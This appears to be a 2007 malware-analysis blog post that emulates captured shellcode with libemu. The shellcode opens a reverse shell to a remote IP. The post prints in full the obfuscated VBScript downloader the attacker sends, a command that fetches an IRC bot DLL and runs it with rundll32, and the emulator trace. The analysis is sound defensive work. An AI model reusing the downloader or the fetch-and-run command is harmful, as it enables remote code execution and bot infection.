The Internet Stormcenter recently published a call for packets and asked for a shellcode analysis. We received the dump from the incidents handler William Salusky and here is the libemu result:
the shellcodes graph
The shellcode spawns a command prompt and connects this shell to 219.150.93.35 10000.
The server sends
cd wins & ECHO SEt P=cREAtEOBjEct("micROSOFt.xmL"^&X^&"http"):P.OpEn "gEt",wScRipt.ARgUmEntS(0),0:P.SEnd():SEt S=cREAtEOBjEct("AdOdB.S"^&X^&"tREAm"):S.mOdE=3:S.tYpE=1:S.OpEn():S.wRitE(P.RESpOnSEBOdY):S.SAvEtOFiLE wScRipt.ARgUmEntS(1),2 >lite.vbe
cmd.exe /c "cscript.exe lite.vbe http://61.129.112.73/images/menu/dnz.dll dnz.dll & rundll32 dnz.dll,ShellMain"
which gets executed by the attacked client. Removing the obfuscation, a file is downloaded from 61.129.112.73/images/menu/dnz.dll and stored as dnz.dll, which gets started by rundll32.
The file is an irc bot with very bad detection rates as of the virustotal run yesterday evening:
File dnz.dll received on 08.23.2007 21:05:21 (CET) Result: 4/32 (12.5%)
| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AhnLab-V3 | 2007.8.22.0 | 2007.08.23 | - |
| AntiVir | 7.4.1.63 | 2007.08.23 | - |
| Authentium | 4.93.8 | 2007.08.23 | - |
| Avast | 4.7.1029.0 | 2007.08.23 | - |
| AVG | 7.5.0.484 | 2007.08.23 | BackDoor.Ircbot.BAO |
| BitDefender | 7.2 | 2007.08.23 | - |
| CAT-QuickHeal | 9.00 | 2007.08.23 | - |
| ClamAV | 0.91 | 2007.08.23 | - |
| DrWeb | 4.33 | 2007.08.23 | - |
| eSafe | 7.0.15.0 | 2007.08.23 | - |
| eTrust-Vet | 31.1.5082 | 2007.08.23 | - |
| Ewido | 4.0 | 2007.08.23 | - |
| FileAdvisor | 1 | 2007.08.23 | - |
| Fortinet | 2.91.0.0 | 2007.08.23 | - |
| F-Prot | 4.3.2.48 | 2007.08.23 | - |
| F-Secure | 6.70.13030.0 | 2007.08.23 | - |
| Ikarus T | 3.1.1.12 | 2007.08.23 | - |
| Kaspersky | 4.0.2.24 | 2007.08.23 | - |
| McAfee | 5104 | 2007.08.23 | - |
| Microsoft | 1.2803 | 2007.08.23 | - |
| NOD32v2 | 2480 | 2007.08.23 | probably a variant of Win32/IRCBot |
| Norman | 5.80.02 | 2007.08.23 | - |
| Panda | 9.0.0.4 | 2007.08.23 | - |
| Prevx1 | V2 | 2007.08.23 | - |
| Rising | 19.37.32.00 | 2007.08.23 | - |
| Sophos | 4.20.0 | 2007.08.23 | - |
| Sunbelt | 2.2.907.0 | 2007.08.23 | - |
| Symantec | 10 | 2007.08.23 | - |
| TheHacker | 6.1.8.172 | 2007.08.23 | - |
| VBA32 | 3.12.2.3 | 2007.08.23 | suspected of Backdoor.xBot.3 |
| VirusBuster | 4.3.26:9 | 2007.08.23 | - |
| Webwasher-Gateway | 6.0.1 | 2007.08.23 | Win32.Malware.gen!92 (suspicious) |
Additional information File size: 24064 bytes MD5: 60cad46ccc51fefbadd1d0874c1c26d2 SHA1: 1db02d6916122cc3065b86786c2a25a5eebd1af3
Apply patches in time, always.
For the completeness, here are the details
cat session_8016.5168.raw2 | /opt/libemu/bin/sctest -S -g -s 100000000
-G dox.dot
graph file dox.dot
success
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:661
emu_env_w32_hook_LoadLibrayA
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:517
emu_env_w32_hook_WSAStartup
WSAStartup version 2
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:461
emu_env_w32_hook_WSASocketA
SOCKET WSASocket(af=2, type=1, protocol=0, lpProtocolInfo=0, group=0,
dwFlags=0);
socket 3
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:182
emu_env_w32_hook_connect
host 219.150.93.35 port 10000
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:134
emu_env_w32_hook_CreateProcessA
CreateProcessA
CreateProcess(pszImageName=0, pszCmdLine=22cc80, psaProcess=0,
psaThread=0, fInheritHandles=1, fdwCreate=0, pvEnvironment=0,
pszCurDir=0, psiStartInfo=22cc2c, pProcInfo=22cc70)
PROCESS_INFORMATION
{
HANDLE hProcess=4711;
HANDLE hThread=4712;
DWORD dwProcessId=4713;
DWORD dwThreadId=4714;
}
STARTUPINFO {
DWORD cb=68;
LPTSTR lpReserved=0x00000000;
LPTSTR lpDesktop=0x00000000;
LPTSTR lpTitle=0x00000000;
DWORD dwX=0;
DWORD dwY=0;
DWORD dwXSize=0;
DWORD dwYSize=0;
DWORD dwXCountChars=0;
DWORD dwYCountChars=0;
DWORD dwFillAttribute=0;
DWORD dwFlags=257;
WORD wShowWindow=0;
WORD cbReserved2=0;
LPBYTE lpReserved2=0x080;
HANDLE hStdInput=3;
HANDLE hStdOutput=3;
HANDLE hStdError=3;
}
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:815
emu_env_w32_hook_WaitForSingleObject
WaitForSingleObject(hHandle=17920, dwMilliseconds=-1)
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_ws2_32_hooks.c:152
emu_env_w32_hook_closesocket
Hook me Captain Cook!
environment/win32/emu_env_w32_dll_export_kernel32_hooks.c:789
emu_env_w32_hook_SetUnhandledExceptionFilter
Exception filter 7c800000
cpu error error accessing 0x7c81cdc7 not mapped
